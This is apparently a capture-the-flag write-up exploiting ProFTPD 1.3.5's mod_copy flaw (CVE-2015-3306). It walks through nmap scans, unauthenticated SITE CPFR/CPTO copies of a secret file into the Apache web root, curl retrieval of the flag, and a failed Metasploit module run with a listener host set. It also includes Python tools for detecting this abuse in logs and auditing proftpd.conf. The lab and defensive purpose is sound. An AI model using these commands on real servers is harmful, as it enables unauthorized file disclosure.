This write-up documents the full exploitation chain used to discover and extract a hidden flag from a vulnerable ProFTPD 1.3.5 server using the mod_copy feature.

πŸ” 1. Initial Reconnaissance

We began by scanning the target to identify open services.

nmap -sV 172.20.50.54

Findings:

  • Port 21/tcp open → FTP service
  • Service: ProFTPD 1.3.5

This version is known to be vulnerable (CVE-2015-3306) when mod_copy is enabled: the module's SITE CPFR and SITE CPTO commands can be issued by a client that has not authenticated.

🔎 2. Deeper Service Enumeration

We confirmed FTP details:

nmap -sV -p 21 172.20.50.54

Output:

ProFTPD 1.3.5 Server (Default Installation)

We attempted anonymous login:

ftp 172.20.50.54

Result:

  • Anonymous login ❌ failed

This suggested restricted authentication but did not rule out misconfigured FTP commands.

⚠️ 3. Testing FTP Command Behavior

We connected using netcat to test manual FTP commands:

nc 172.20.50.54 21

Server responded:

220 ProFTPD 1.3.5 Server

We tested basic commands:

ls
cat /tmp/test.txt

Response:

500 Invalid command

This indicated:

  • Only FTP protocol commands are parsed; shell commands such as ls and cat are rejected outright
  • But the FTP command interface itself was active and accepting input

🔓 4. Discovery of mod_copy Misconfiguration

While interacting with FTP, we discovered support for:

SITE CPFR
SITE CPTO

This is the mod_copy feature: CPFR names the source path and CPTO the destination path, so a file can be copied directly on the server without ever being transferred over the data channel.

🚀 5. Exploitation (Manual Method)

We attempted to copy sensitive files:

SITE CPFR /secret.txt
SITE CPTO /tmp/secret.txt

Result:

250 Copy successful

We confirmed the file was copied successfully.
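The exchange above (SITE CPFR, then SITE CPTO, answered with a 250) is exactly what should stand out in an FTP server's command log. The following detector is an added example for this write-up, not ProFTPD's own code: it parses ExtendedLog lines (assuming ProFTPD's "default" LogFormat `%h %l %u %t "%r" %s %b`), flags every mod_copy command, and raises the severity when the command arrived before any login (the CVE-2015-3306 condition) or when the copy destination lies under a web root. The log lines, client addresses and paths in SAMPLE_LOG are constructed for the example.

```python
"""Detection of ProFTPD mod_copy abuse (SITE CPFR / SITE CPTO) in FTP command logs.

Added example for this write-up, not ProFTPD's own code. It assumes ExtendedLog
lines in ProFTPD's "default" LogFormat (%h %l %u %t "%r" %s %b); if your
LogFormat differs, adjust LINE_RE. All sample log lines below are constructed.
"""
import re
from dataclasses import dataclass

# One ExtendedLog line: client host, ident, authenticated user ("-" before login),
# timestamp, the full command line, the 3-digit response code, bytes transferred.
LINE_RE = re.compile(
    r'^(?P<host>\S+) (?P<ident>\S+) (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<cmd>[^"]*)" (?P<status>\d{3}) (?P<size>\S+)$'
)

# The two mod_copy SITE commands; CPFR names the source, CPTO the destination.
COPY_RE = re.compile(r'^SITE\s+(?P<verb>CPFR|CPTO)\s+(?P<path>\S+)', re.IGNORECASE)

# Constructed sample: an unauthenticated client copying a file into the web
# root (the pattern from this write-up), followed by a logged-in user making
# an ordinary copy inside their own home directory.
SAMPLE_LOG = """\
198.51.100.23 - - [12/Mar/2024:09:14:02 +0000] "SITE CPFR /secret.txt" 350 0
198.51.100.23 - - [12/Mar/2024:09:14:05 +0000] "SITE CPTO /var/www/html/secret.txt" 250 0
203.0.113.8 - alice [12/Mar/2024:09:30:11 +0000] "SITE CPFR /home/alice/report.txt" 350 0
203.0.113.8 - alice [12/Mar/2024:09:30:12 +0000] "SITE CPTO /home/alice/report.bak" 250 0
203.0.113.8 - alice [12/Mar/2024:09:31:00 +0000] "RETR report.bak" 226 4096
"""


@dataclass
class Entry:
    host: str
    user: str
    time: str
    cmd: str
    status: int


@dataclass
class Alert:
    severity: str      # "high" or "info"
    reasons: list
    entry: Entry


def parse_line(line):
    """Return an Entry for a well-formed log line, or None for anything else."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    return Entry(m["host"], m["user"], m["time"], m["cmd"], int(m["status"]))


def under_root(path, root):
    """True if path is root itself or lies below it (no /var/wwwX false positives)."""
    root = root.rstrip("/")
    return path == root or path.startswith(root + "/")


def find_copy_abuse(lines, web_roots=("/var/www",)):
    """Flag every SITE CPFR/CPTO; escalate to "high" when the command was issued
    before authentication (the CVE-2015-3306 condition) or when a CPTO lands
    under a web root, which turns a server-side copy into public disclosure."""
    alerts = []
    for line in lines:
        e = parse_line(line)
        if e is None:
            continue
        c = COPY_RE.match(e.cmd)
        if c is None:
            continue
        verb, path = c["verb"].upper(), c["path"]
        reasons = []
        if e.user == "-":
            reasons.append(f"SITE {verb} issued before authentication (CVE-2015-3306 pattern)")
        if verb == "CPTO" and any(under_root(path, r) for r in web_roots):
            reasons.append(f"copy destination {path} is under a web root")
        severity = "high" if reasons else "info"
        if not reasons:
            reasons.append(f"mod_copy command in use: {e.cmd}")
        alerts.append(Alert(severity, reasons, e))
    return alerts


if __name__ == "__main__":
    for a in find_copy_abuse(SAMPLE_LOG.splitlines()):
        print(f"[{a.severity}] {a.entry.host} user={a.entry.user} {a.entry.cmd!r} "
              f"-> {a.entry.status}: {'; '.join(a.reasons)}")
```

Failed attempts (a 550 instead of the 250 seen above) are reported too, since a rejected CPTO into the web root is still reconnaissance worth seeing; filter on `entry.status` if you only want successful copies.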

🌐 6. Web Server Enumeration

We checked the HTTP service:

curl http://172.20.50.54/

Result:

  • Apache2 Debian Default Page
  • Document root likely: /var/www/html

We tested file access:

curl http://172.20.50.54/tmp/secret.txt

❌ Not found (/tmp lies outside the Apache document root, so it is not web-accessible)

🎯 7. Correct Exploitation Path

We redirected the file into the Apache web directory:

SITE CPFR /secret.txt
SITE CPTO /var/www/html/secret.txt

βœ”οΈ Copy successful

📑 8. Flag Retrieval

Once placed in the web root, the file became accessible via HTTP:

curl http://172.20.50.54/secret.txt

🏁 Flag:

Tyrannosaurus

🧠 9. Metasploit Attempt (Alternative Approach)

We also attempted exploitation using Metasploit:

use exploit/unix/ftp/proftpd_modcopy_exec
set RHOSTS 172.20.50.54
set RPORT_FTP 21
set LHOST 10.8.48.79
set LPORT 5555
exploit

Result:

  • Exploit partially executed
  • Payload failed due to:
      • incorrect writable path assumptions
      • missing execution conditions
      • web root restrictions

👉 Conclusion: manual exploitation was more reliable in this case.

📌 Final Attack Chain Summary

  1. Scan target → discovered FTP (ProFTPD 1.3.5)
  2. Tested login β†’ anonymous login failed
  3. Discovered mod_copy support
  4. Used SITE CPFR / CPTO to copy files
  5. Identified Apache web root (/var/www/html)
  6. Copied /secret.txt into web directory
  7. Retrieved flag via HTTP

πŸ›‘οΈ Lessons Learned

  • mod_copy misconfiguration = critical file disclosure risk
  • FTP services should NEVER allow arbitrary file copy operations
  • Web root directories must not be writable by external services
  • Always verify service versions for known CVEs (like CVE-2015-3306)
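To make the first two lessons checkable, here is an added example (not ProFTPD's own tooling) that audits a proftpd.conf for an unrestricted mod_copy and shows the weak configuration beside a hardened one. Assumptions: the module is loaded via `LoadModule mod_copy.c` (Debian keeps that line in /etc/proftpd/modules.conf, so pass the concatenated text); `CopyEngine off` is honored by the installed version (it is not present in every 1.3.x release, and on releases without it the fix is to drop the LoadModule line); and a `<Limit SITE_CPFR SITE_CPTO>` block with `DenyAll` blocks the two copy commands. Both configuration texts are constructed for the example.

```python
"""Audit a proftpd.conf for an unrestricted mod_copy, the state this write-up exploited.

Added example, not ProFTPD's own tooling. Assumed directives: "LoadModule mod_copy.c",
"CopyEngine off" (assumed available in the running version; otherwise remove the
LoadModule line) and "<Limit SITE_CPFR SITE_CPTO> DenyAll </Limit>". The two
configurations below are constructed for the example.
"""
import re

# Constructed weak configuration: mod_copy is loaded and nothing restricts it.
WEAK_CONFIG = """\
ServerName "ProFTPD Default Installation"
LoadModule mod_copy.c
<Anonymous ~ftp>
  User ftp
</Anonymous>
"""

# Constructed hardened variant of the same file: the copy engine is switched
# off and, as a second layer, the SITE copy commands are denied to everyone.
HARDENED_CONFIG = """\
ServerName "ProFTPD Default Installation"
LoadModule mod_copy.c
<IfModule mod_copy.c>
  CopyEngine off
</IfModule>
<Limit SITE_CPFR SITE_CPTO>
  DenyAll
</Limit>
"""

LOADMODULE_RE = re.compile(r'^\s*LoadModule\s+mod_copy\.c\s*$', re.I | re.M)
COPYENGINE_OFF_RE = re.compile(r'^\s*CopyEngine\s+off\s*$', re.I | re.M)
LIMIT_RE = re.compile(r'<Limit\s+([^>]*)>(.*?)</Limit>', re.I | re.S)
DENYALL_RE = re.compile(r'^\s*DenyAll\s*$', re.I | re.M)


def strip_comments(text):
    """Drop '#' comment lines so a commented-out directive is not counted as active."""
    return "\n".join(l for l in text.splitlines() if not l.lstrip().startswith("#"))


def audit_mod_copy(config_text):
    """Classify the config as not_loaded, mitigated or exposed with respect to mod_copy."""
    text = strip_comments(config_text)
    loaded = bool(LOADMODULE_RE.search(text))
    engine_off = bool(COPYENGINE_OFF_RE.search(text))
    # A <Limit> counts only if it names both copy commands and contains DenyAll.
    site_copy_denied = any(
        {"SITE_CPFR", "SITE_CPTO"} <= {n.upper() for n in names.split()}
        and DENYALL_RE.search(body)
        for names, body in LIMIT_RE.findall(text)
    )
    if not loaded:
        risk = "not_loaded"
    elif engine_off or site_copy_denied:
        risk = "mitigated"
    else:
        risk = "exposed"
    findings = []
    if risk == "exposed":
        findings.append("mod_copy is loaded and neither CopyEngine off nor a DenyAll "
                        "<Limit SITE_CPFR SITE_CPTO> restricts it: any client may issue "
                        "SITE CPFR/CPTO")
    elif risk == "mitigated":
        findings.append("mod_copy is restricted; removing the LoadModule line removes "
                        "the attack surface entirely")
    return {"mod_copy_loaded": loaded, "copy_engine_off": engine_off,
            "site_copy_denied": site_copy_denied, "risk": risk, "findings": findings}


if __name__ == "__main__":
    for name, cfg in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        result = audit_mod_copy(cfg)
        print(f"{name}: {result['risk']}")
        for finding in result["findings"]:
            print("  -", finding)
```

Run it against the live file (`audit_mod_copy(open("/etc/proftpd/proftpd.conf").read() + open("/etc/proftpd/modules.conf").read())` on a Debian layout) as a post-deployment check; "not_loaded" is the strongest outcome, "mitigated" is acceptable, and "exposed" is the condition this write-up exploited.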

🔥 Takeaway

This challenge demonstrates how a simple FTP misconfiguration can lead to full sensitive file disclosure without needing complex exploits or reverse shells: just protocol abuse and proper enumeration.